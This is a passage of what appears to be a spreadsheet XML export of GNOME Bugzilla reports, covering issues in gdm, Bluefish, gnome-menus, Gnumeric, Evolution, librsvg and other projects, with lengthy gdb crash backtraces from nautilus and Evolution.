#0  0xffffe410 in ?? ()
#1  0xbffff6c8 in ?? ()
#2  0x0035801b in ?? ()
#3  0x00000008 in ?? ()
#4  0xb7097589 in poll () from /lib/tls/i686/cmov/libc.so.6
#5  0xb73fa8b6 in g_main_loop_get_context () from /usr/lib/libglib-2.0.so.0
#6  0xb73f9f2f in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#7  0xb73fa4f6 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#8  0xb75386f3 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#9  0x08076412 in main (argc=3 argv=0xbffff904) at main.c:225
Thread 3 (Thread -1233450064 (LWP 15521)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0xb67b09d8 in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x00000009 in ?? ()
No symbol table info available.
#4  0xb7097589 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#5  0xb73fa8b6 in g_main_loop_get_context () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb73f9f2f in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb73fa4f6 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb74b7f28 in link_thread_io_context () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#9  0xb7451398 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb67b0ad8 in ?? ()
No symbol table info available.
#11 0xb74122f2 in g_static_private_free () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#0  0xffffe410 in ?? ()</t>
  </si>
  <si>
    <t>thejoe</t>
  </si>
  <si>
    <t>GDM-117889</t>
  </si>
  <si>
    <t>daemon uses libgnome header</t>
  </si>
  <si>
    <t>gdm 2.4.2.97
In configure.in
PKG_CHECK_MODULES for daemon checks for gdk-pixbuf and gtk+ but not libgnome.
Yet many gdm2/daemon/*.c files
#include 
I guess this can be removed now (perhaps replacing with a gtk header).</t>
  </si>
  <si>
    <t>BLUEFISH-331904</t>
  </si>
  <si>
    <t>left panel file browser dont show any files or directories</t>
  </si>
  <si>
    <t>Please describe the problem:
MesListes# ls listes
art.mb    copyleft_attitude.mb  images.mb  MesDB.xml.bak~
bises.mb  droit.mb              kernel.mb  todo.php
MesListes# ls test
art.mb                 db.xml     kernel.mb~      todo.php
bises.mb               droit.mb   MesDB.xml
copyleft_attitude.mb   images.mb  MesDB.xml.bak~
copyleft_attitude.mb~  kernel.mb  todo2.php
MesListes# mv listes/ panne/
MesListes# mv test/ listes
BF left panel file browser MesListes/listes shows only :
	copyleft_attitude.mb~
	db.xml
	kernel.mb~
	MesDB.xml
	todo2.php
that is only files that WAS NOT in previous listes directory.
combobox open_file shows all files.
Steps to reproduce:
1. open in left panel a directory with subdirectories A and B
2. mv A C &amp;&amp; mv B A
3. refresh left panel
Actual results:
Expected results:
Does this happen every time?
yes.
Other information:
if you have subdirectories in moved dirctories the same occures as for files.
you have to close BF and reopen it all is correct now.</t>
  </si>
  <si>
    <t>falsetti</t>
  </si>
  <si>
    <t>GNOME-MENUS-305723</t>
  </si>
  <si>
    <t>layout</t>
  </si>
  <si>
    <t>GNOME-MENUS</t>
  </si>
  <si>
    <t xml:space="preserve"> isn't working correctly</t>
  </si>
  <si>
    <t>Please describe the problem:
The menu-spec states the following:  
It indicates the point where desktop entries and sub-menus that are not  
explicitly mentioned within the  or  element are to be  
inserted.  
But gnome-menus merges all menus/files into the menu when finding a &lt;Merge  
type=/&gt; tag regardless if they are specified in the Layout. Here is a small  
example:  
 Menu1 
 Menu2 
 Menu3 
  Menu1 
The order of the menu now should be Menu2-Menu3-Menu1 but gnome menu does 
Menu1-Menu2-Menu3 
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>gnome-menus-maint</t>
  </si>
  <si>
    <t>lanius</t>
  </si>
  <si>
    <t>GNUMERIC-57351</t>
  </si>
  <si>
    <t>import/export MS Excel (tm)</t>
  </si>
  <si>
    <t>Excel export produces unreadable files</t>
  </si>
  <si>
    <t>If I try to Save a Gnumeric spreadsheet as Excel 95 file format resulting
spreadsheet is not readable by Excel 2000.
Attachments coming up</t>
  </si>
  <si>
    <t>vuksan</t>
  </si>
  <si>
    <t>EVOLUTION-208232</t>
  </si>
  <si>
    <t>Forwarded messages loose their pgp signature</t>
  </si>
  <si>
    <t>If I recieve a PGP signed message and forward it on Evolution appears to
remove the signature.  Surely it should be retained?</t>
  </si>
  <si>
    <t>SCAFFOLD-73736</t>
  </si>
  <si>
    <t>miscellaneous</t>
  </si>
  <si>
    <t>SCAFFOLD</t>
  </si>
  <si>
    <t>Files missing from anjuta2 POTFILES.in</t>
  </si>
  <si>
    <t>When I run intltool-update -M in the po directory I get:
---
The following files contain translations and are currently not in use. Please
consider adding these to the POTFILES.in file located in the po/ directory.
Anjuta2.desktop.in
src/GNOME_Development_AnjutaMoniker.server.in
If some of these files are left out on purpose then please add them to
POTFILES.skip instead of POTFILES.in. A file 'missing' containing this list
of left out files has been written in the current directory.
---</t>
  </si>
  <si>
    <t>EPIPHANY-760442</t>
  </si>
  <si>
    <t>Cannot run Epiphany in JHBuild prefix if GD Graphics Library is installed</t>
  </si>
  <si>
    <t>Epiphany requires libgd.so installed in its private directory to start. It uses RUNPATH to add its private directory to the library search path. Unfortunately there is an unrelated library that is also called libgd.so: https://libgd.github.io/.  As RUNPATH can be overrided by LD_LIBRARY_PATH environment variable Epiphany will fail to start if an unrelated libgd.so is installed in LD_LIBRARY_PATH.
$ epiphany 
/home/lantw44/gnome/devinstall/bin/epiphany: Undefined symbol gd_two_lines_renderer_new
$ ldd `which epiphany` | grep libgd.so
	libgd.so =&gt; /usr/local/lib/libgd.so (0x800912000)</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-226952</t>
  </si>
  <si>
    <t>Tasks don't appear when Calendar is opened in new window</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
User reports that when he opens his Calendar in a new window the tasks do
not appear on the right side of the screen.
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen? 
All the time according to the user.
Additional Information:</t>
  </si>
  <si>
    <t>dcollins</t>
  </si>
  <si>
    <t>LIBRSVG-319095</t>
  </si>
  <si>
    <t>nautilus crash</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: nautilus
Severity: normal
Version: GNOME2.10.2 unspecified
Gnome-Distributor: Debian
Synopsis: nautilus crash
Bugzilla-Product: nautilus
Bugzilla-Component: Desktop
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.10.1)
Description:
Description of the crash:
A few times a day I get a crashing nautilus
Steps to reproduce the crash:
1.  run nautilus
2.  goto work sleep
3.  return to find a crashed nautilus
Expected Results:
a non crashing nautilus
How often does this happen?
few times a day
Additional Information:
on my desktop is a homebrew svg icon wich 
live updates of the last referers
like this:
&lt;!DOCTYPE svg PUBLIC -//W3C//DTD SVG 20010904//EN
http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd&gt;
&lt;svg
   id=svg134
   sodipodi:version=0.29pre
   width=1000pt
   height=200pt
   sodipodi:docbase=/home/jip/.gnome-desktop/
   sodipodi:docname=/home/jip/.gnome-desktop/refer.svg
   xmlns=http://www.w3.org/2000/svg
   xmlns:sodipodi=http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
   xmlns:xlink=http://www.w3.org/1999/xlink&gt;
  &lt;defs
     id=defs136 /&gt;
  &lt;sodipodi:namedview
     id=base /&gt;
  &lt;rect
style=font-size:12fill:#808080fill-opacity:0.260417fill-rule:evenoddst
roke:#c19100stroke-width:18.653stroke-opacity:0.427184
     id=rect137
     x=19.3998
     y=15.9694
     width=1217.44
     height=222.566
     ry=48.5075 /&gt;
  &lt;text
style=fill:whitestroke:nonefont-family:Arialfont-style:normalfont-weig
ht:normalfont-size:48fill-opacity:1stroke-opacity:1stroke-width:1ptstroke-l
inejoin:miterstroke-linecap:butttext-anchor:startwriting-mode:lr
     x=33.3176
     y=72.2088
     id=text125&gt;
    &lt;tspan
       x=4
       y=2
       sodipodi:role=line
       id=tspan127&gt;Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1
MSOCD F
unWebProducts .NET CLR 1.1.4322)
GET /gfx/2002/Espion/ HTTP/1.1
cp251521-a.tilbu1.nb.home.nl
Debugging Information:
Backtrace was generated from '/usr/bin/nautilus'
(no debugging symbols found)
Using host libthread_db library /lib/tls/libthread_db.so.1.
(no debugging symbols found)
`system-supplied DSO at 0xffffe000' has disappeared keeping its
symbols.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Thread debugging using libthread_db enabled]
[New Thread -1224979552 (LWP 23964)]
[New Thread -1242629200 (LWP 23972)]
[New Thread -1242367056 (LWP 23971)]
[New Thread -1242104912 (LWP 23970)]
[New Thread -1241842768 (LWP 23969)]
[New Thread -1241580624 (LWP 23968)]
[New Thread -1241318480 (LWP 23967)]
[New Thread -1227883600 (LWP 23966)]
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
0xb73b9201 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb73b9201 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7d19ee3 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0xb7ad8a57 in art_svp_seg_compare () from
/usr/lib/libart_lgpl_2.so.2
#4  0xb7ada3d2 in art_svp_writer_rewind_new ()
   from /usr/lib/libart_lgpl_2.so.2
#5  0xb7ada598 in art_svp_intersector () from
/usr/lib/libart_lgpl_2.so.2
#6  0xb7db74ad in rsvg_clip_path_merge () from /usr/lib/librsvg-2.so.2
#7  0xb7db76b7 in rsvg_clip_path_merge () from /usr/lib/librsvg-2.so.2
#8  0xb7db7bc0 in rsvg_render_path () from /usr/lib/librsvg-2.so.2
#9  0xb7dc5ac1 in rsvg_text_render_text () from /usr/lib/librsvg-2.so.2
#10 0xb7dc4178 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
#11 0xb7dc4267 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
#12 0xb7dc414b in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
#13 0xb7dc4267 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
#14 0xb7dc44d3 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
#15 0xb7db7c70 in rsvg_defs_drawable_draw () from
/usr/lib/librsvg-2.so.2
#16 0xb7db7e91 in rsvg_defs_drawable_draw_as_svp ()
   from /usr/lib/librsvg-2.so.2
#17 0xb7db7c70 in rsvg_defs_drawable_draw () from
/usr/lib/librsvg-2.so.2
#18 0xb7dca1cd in rsvg_handle_get_pixbuf () from
/usr/lib/librsvg-2.so.2
#19 0xb7da9f64 in rsvg_pixbuf_from_data_with_size_data ()
   from /usr/lib/librsvg-2.so.2
#20 0xb7daa021 in rsvg_pixbuf_from_data_with_size_data ()
   from /usr/lib/librsvg-2.so.2
#21 0xb7daa4e9 in rsvg_pixbuf_from_file_at_max_size ()
   from /usr/lib/librsvg-2.so.2
#22 0xb7ee2907 in nautilus_self_check_icon_factory ()
   from /usr/lib/libnautilus-private.so.2
#23 0xb7ee2dea in nautilus_self_check_icon_factory ()
   from /usr/lib/libnautilus-private.so.2
#24 0xb7ed5d90 in nautilus_icon_container_update_icon ()
   from /usr/lib/libnautilus-private.so.2
#25 0xb7ed66f7 in nautilus_icon_container_request_update ()
   from /usr/lib/libnautilus-private.so.2
#26 0x0809e7e4 in fm_icon_view_get_type ()
#27 0xb76d00b0 in g_cclosure_marshal_VOID__OBJECT ()
   from /usr/lib/libgobject-2.0.so.0
#28 0xb76c2fd8 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#29 0xb76c367b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#30 0xb76d2ea2 in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
#31 0xb76d4077 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#32 0xb76d442e in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#33 0x08096bbc in fm_directory_view_should_show_file ()
#34 0xb7509911 in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
#35 0xb75073d1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#36 0xb750a637 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
#37 0xb750ab88 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#38 0xb7921989 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#39 0x08076599 in main ()
Thread 8 (Thread -1227883600 (LWP 23966)):
#0  0xb733d5a9 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb750a52b in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0xb750ab88 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb75a9aef in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#4  0xb7524da5 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb73b3ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xb7347b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 7 (Thread -1241318480 (LWP 23967)):
#0  0xb73b5b61 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7698b04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb7698b5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb7524da5 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb73b3ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb7347b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread -1241580624 (LWP 23968)):
#0  0xb73b5b61 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7698b04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb7698b5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb7524da5 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb73b3ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb7347b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread -1241842768 (LWP 23969)):
#0  0xb73b5b61 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7698b04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb7698b5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb7524da5 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb73b3ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb7347b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread -1242104912 (LWP 23970)):
#0  0xb73b5b61 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7698b04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb7698b5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb7524da5 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb73b3ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb7347b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread -1242367056 (LWP 23971)):
#0  0xb73b5b61 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7698b04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb7698b5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb7524da5 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb73b3ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb7347b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread -1242629200 (LWP 23972)):
#0  0xb73b5b61 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7698b04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb7698b5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb7524da5 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb73b3ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb7347b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1224979552 (LWP 23964)):
#0  0xb73b9201 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7d19ee3 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0xb7ad8a57 in art_svp_seg_compare () from
/usr/lib/libart_lgpl_2.so.2
No symbol table info available.
#4  0xb7ada3d2 in art_svp_writer_rewind_new ()
   from /usr/lib/libart_lgpl_2.so.2
No symbol table info available.
#5  0xb7ada598 in art_svp_intersector () from
/usr/lib/libart_lgpl_2.so.2
No symbol table info available.
#6  0xb7db74ad in rsvg_clip_path_merge () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#7  0xb7db76b7 in rsvg_clip_path_merge () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#8  0xb7db7bc0 in rsvg_render_path () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#9  0xb7dc5ac1 in rsvg_text_render_text () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#10 0xb7dc4178 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#11 0xb7dc4267 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#12 0xb7dc414b in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#13 0xb7dc4267 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#14 0xb7dc44d3 in rsvg_make_valid_utf8 () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#15 0xb7db7c70 in rsvg_defs_drawable_draw () from
/usr/lib/librsvg-2.so.2
No symbol table info available.
#16 0xb7db7e91 in rsvg_defs_drawable_draw_as_svp ()
   from /usr/lib/librsvg-2.so.2
No symbol table info available.
#17 0xb7db7c70 in rsvg_defs_drawable_draw () from
/usr/lib/librsvg-2.so.2
No symbol table info available.
#18 0xb7dca1cd in rsvg_handle_get_pixbuf () from
/usr/lib/librsvg-2.so.2
No symbol table info available.
#19 0xb7da9f64 in rsvg_pixbuf_from_data_with_size_data ()
   from /usr/lib/librsvg-2.so.2
No symbol table info available.
#20 0xb7daa021 in rsvg_pixbuf_from_data_with_size_data ()
   from /usr/lib/librsvg-2.so.2
No symbol table info available.
#21 0xb7daa4e9 in rsvg_pixbuf_from_file_at_max_size ()
   from /usr/lib/librsvg-2.so.2
No symbol table info available.
#22 0xb7ee2907 in nautilus_self_check_icon_factory ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#23 0xb7ee2dea in nautilus_self_check_icon_factory ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#24 0xb7ed5d90 in nautilus_icon_container_update_icon ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#25 0xb7ed66f7 in nautilus_icon_container_request_update ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#26 0x0809e7e4 in fm_icon_view_get_type ()
No symbol table info available.
#27 0xb76d00b0 in g_cclosure_marshal_VOID__OBJECT ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0xb76c2fd8 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0xb76c367b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0xb76d2ea2 in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0xb76d4077 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0xb76d442e in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0x08096bbc in fm_directory_view_should_show_file ()
No symbol table info available.
#34 0xb7509911 in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#35 0xb75073d1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#36 0xb750a637 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#37 0xb750ab88 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#38 0xb7921989 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x08076599 in main ()
No symbol table info available.
#0  0xb73b9201 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
------- Bug moved to this database by unknown@gnome.bugs 2005-10-17 17:59 UTC -------
</t>
  </si>
  <si>
    <t>pip</t>
  </si>
  <si>
    <t>YELP-101076</t>
  </si>
  <si>
    <t>patch to add startup-notification support to yelp's .desktop file</t>
  </si>
  <si>
    <t>Is this ok to commit to HEAD?</t>
  </si>
  <si>
    <t>aldug</t>
  </si>
  <si>
    <t>LIBRSVG-339641</t>
  </si>
  <si>
    <t>Does not export rsvg_error_get_type</t>
  </si>
  <si>
    <t>[ forwarded from http://bugs.debian.org/362646 ]
The librsvg_error_get_type function is not exported in librsvg.def. However it is needed by some language bindings. As it isn't used in the source there is no way it can even be useful without being exported.</t>
  </si>
  <si>
    <t>EVOLUTION-216253</t>
  </si>
  <si>
    <t>Right-click menu in Tasks</t>
  </si>
  <si>
    <t>In the Tasks component it should be possible to access the settings dialog
and to assign the task from the right-click menu.
Speaking of menus users have also requested a menu item which functions
like expunge in the mailer that is which permanently erases all
completed tasks. This should be added to the Edit menuand should also be
in the right-click menu.</t>
  </si>
  <si>
    <t>LIBGOFFICE-522458</t>
  </si>
  <si>
    <t>LIBGOFFICE</t>
  </si>
  <si>
    <t>Use gio from glib</t>
  </si>
  <si>
    <t>We should drop gnome-vfs as a dependency asap.  (Conditional on gio
support in libgsf.)</t>
  </si>
  <si>
    <t>EVOLUTION-272224</t>
  </si>
  <si>
    <t>Crashes when opened</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Novell Linux Desktop 9 (i586)
Package: Evolution
Priority: Normal
Version: GNOME2.6. 2.1.4
Gnome-Distributor: Novell Inc.
Synopsis: Crashes when opened
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Bugzilla-Version: 2.1.4
BugBuddy-GnomeVersion: 2.0 (2.6.0)
Description:
Description of the crash:
Evolution 02/02/005 build crashes when opened.
Camal debug says:
camel-ERROR **: file camel-internet-address.c: line 459
(camel_internet_address_encode_address): assertion failed: (addr)
aborting...
Steps to reproduce the crash:
1. Open Evolution
2. 
3. 
Expected Results:
How often does this happen?
every time.
Additional Information:
Debugging Information:
Backtrace was generated from '/opt/gnome/bin/evolution-2.2'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 1095028032 (LWP 13946)]
[New Thread 1114680240 (LWP 13999)]
[Thread debugging using libthread_db enabled]
[New Thread 1095028032 (LWP 13946)]
[New Thread 1114680240 (LWP 13999)]
[New Thread 1112578992 (LWP 13996)]
[New Thread 1110084528 (LWP 13984)]
[New Thread 1107983280 (LWP 13983)]
[New Thread 1105525680 (LWP 13956)]
[New Thread 1103424432 (LWP 13955)]
[Thread debugging using libthread_db enabled]
[New Thread 1095028032 (LWP 13946)]
[New Thread 1114680240 (LWP 13999)]
0xffffe410 in ?? ()
#0  0xffffe410 in ?? ()
#1  0xbfffede8 in ?? ()
#2  0x0008e32f in ?? ()
#3  0x0000000e in ?? ()
#4  0x4122e804 in poll () from /lib/tls/libc.so.6
#5  0x41126558 in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
#6  0x411277b7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
#7  0x408764d0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#8  0x08065e50 in main (argc=1 argv=0xbffff094) at main.c:613
Thread 7 (Thread 1103424432 (LWP 13955)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41c4ea68 in ?? ()
No symbol table info available.
#2  0x00000007 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40f9d896 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x401d861e in e_msgport_wait (mp=0x81b3358) at e-msgport.c:511
	_buffer = {__routine = 0x401d8386  
  __arg = 0x81b3358 __canceltype = 136305648 __prev = 0x0}
	msg = (EMsg *) 0x0
#6  0x401d8f36 in thread_dispatch (din=0x81ac050) at e-msgport.c:874
	e = (EThread *) 0x81ac050
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x81ec418
	self = 1103424432
#7  0x40f9ba13 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x412379da in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread 1105525680 (LWP 13956)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41e4fa68 in ?? ()
No symbol table info available.
#2  0x00000008 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40f9d896 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x401d861e in e_msgport_wait (mp=0x81b3358) at e-msgport.c:511
	_buffer = {__routine = 0x401d8386  
  __arg = 0x81b3358 __canceltype = 137115624 __prev = 0x0}
	msg = (EMsg *) 0x0
#6  0x401d8f36 in thread_dispatch (din=0x81ac050) at e-msgport.c:874
	e = (EThread *) 0x81ac050
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x81fd758
	self = 1105525680
#7  0x40f9ba13 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x412379da in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread 1107983280 (LWP 13983)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x420a7a68 in ?? ()
No symbol table info available.
#2  0x00000005 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40f9d896 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x401d861e in e_msgport_wait (mp=0x81b3358) at e-msgport.c:511
	_buffer = {__routine = 0x401d8386  
  __arg = 0x81b3358 __canceltype = 138509032 __prev = 0x0}
	msg = (EMsg *) 0x0
#6  0x401d8f36 in thread_dispatch (din=0x81ac050) at e-msgport.c:874
	e = (EThread *) 0x81ac050
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x84178c0
	self = 1107983280
#7  0x40f9ba13 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x412379da in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread 1110084528 (LWP 13984)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x422a8a68 in ?? ()
No symbol table info available.
#2  0x00000006 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40f9d896 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x401d861e in e_msgport_wait (mp=0x81b3358) at e-msgport.c:511
	_buffer = {__routine = 0x401d8386  
  __arg = 0x81b3358 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0x0
#6  0x401d8f36 in thread_dispatch (din=0x81ac050) at e-msgport.c:874
	e = (EThread *) 0x81ac050
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8415b20
	self = 1110084528
#7  0x40f9ba13 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x412379da in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 1112578992 (LWP 13996)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x42508f44 in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
#3  0x42508e78 in ?? ()
No symbol table info available.
#4  0x40fa118b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x404b7f3a in libgnomeui_segv_handle ()
   from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#6  
No symbol table info available.
